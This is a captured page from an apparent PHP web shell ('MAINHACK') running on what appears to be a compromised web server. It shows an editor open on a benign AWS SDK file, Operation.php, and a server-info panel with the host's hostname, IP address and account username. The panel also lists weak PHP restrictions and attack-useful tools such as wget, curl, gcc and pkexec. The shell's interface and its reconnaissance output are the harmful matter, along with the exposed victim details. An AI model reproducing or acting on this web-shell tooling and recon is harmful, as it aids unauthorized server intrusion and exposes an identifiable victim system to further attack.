[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Operation.php
<?php namespace Aws\Api; /** * Represents an API operation. */ class Operation extends AbstractModel { private $input; private $output; private $errors; private $staticContextParams = []; private $contextParams; private $operationContextParams = []; public function __construct(array $definition, ShapeMap $shapeMap) { $definition['type'] = 'structure'; if (!isset($definition['http']['method'])) { $definition['http']['method'] = 'POST'; } if (!isset($definition['http']['requestUri'])) { $definition['http']['requestUri'] = '/'; } if (isset($definition['staticContextParams'])) { $this->staticContextParams = $definition['staticContextParams']; } if (isset($definition['operationContextParams'])) { $this->operationContextParams = $definition['operationContextParams']; } parent::__construct($definition, $shapeMap); $this->contextParams = $this->setContextParams(); } /** * Returns an associative array of the HTTP attribute of the operation: * * - method: HTTP method of the operation * - requestUri: URI of the request (can include URI template placeholders) * * @return array */ public function getHttp() { return $this->definition['http']; } /** * Get the input shape of the operation. * * @return StructureShape */ public function getInput() { if (!$this->input) { if ($input = $this['input']) { $this->input = $this->shapeFor($input); } else { $this->input = new StructureShape([], $this->shapeMap); } } return $this->input; } /** * Get the output shape of the operation. * * @return StructureShape */ public function getOutput() { if (!$this->output) { if ($output = $this['output']) { $this->output = $this->shapeFor($output); } else { $this->output = new StructureShape([], $this->shapeMap); } } return $this->output; } /** * Get an array of operation error shapes. * * @return Shape[] */ public function getErrors() { if ($this->errors === null) { if ($errors = $this['errors']) { foreach ($errors as $key => $error) { $errors[$key] = $this->shapeFor($error); } $this->errors = $errors; } else { $this->errors = []; } } return $this->errors; } /** * Gets static modeled static values used for * endpoint resolution. * * @return array */ public function getStaticContextParams() { return $this->staticContextParams; } /** * Gets definition of modeled dynamic values used * for endpoint resolution * * @return array */ public function getContextParams() { return $this->contextParams; } /** * Gets definition of modeled dynamic values used * for endpoint resolution * * @return array */ public function getOperationContextParams(): array { return $this->operationContextParams; } private function setContextParams() { $members = $this->getInput()->getMembers(); $contextParams = []; foreach($members as $name => $shape) { if (!empty($contextParam = $shape->getContextParam())) { $contextParams[$contextParam['name']] = [ 'shape' => $name, 'type' => $shape->getType() ]; } } return $contextParams; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002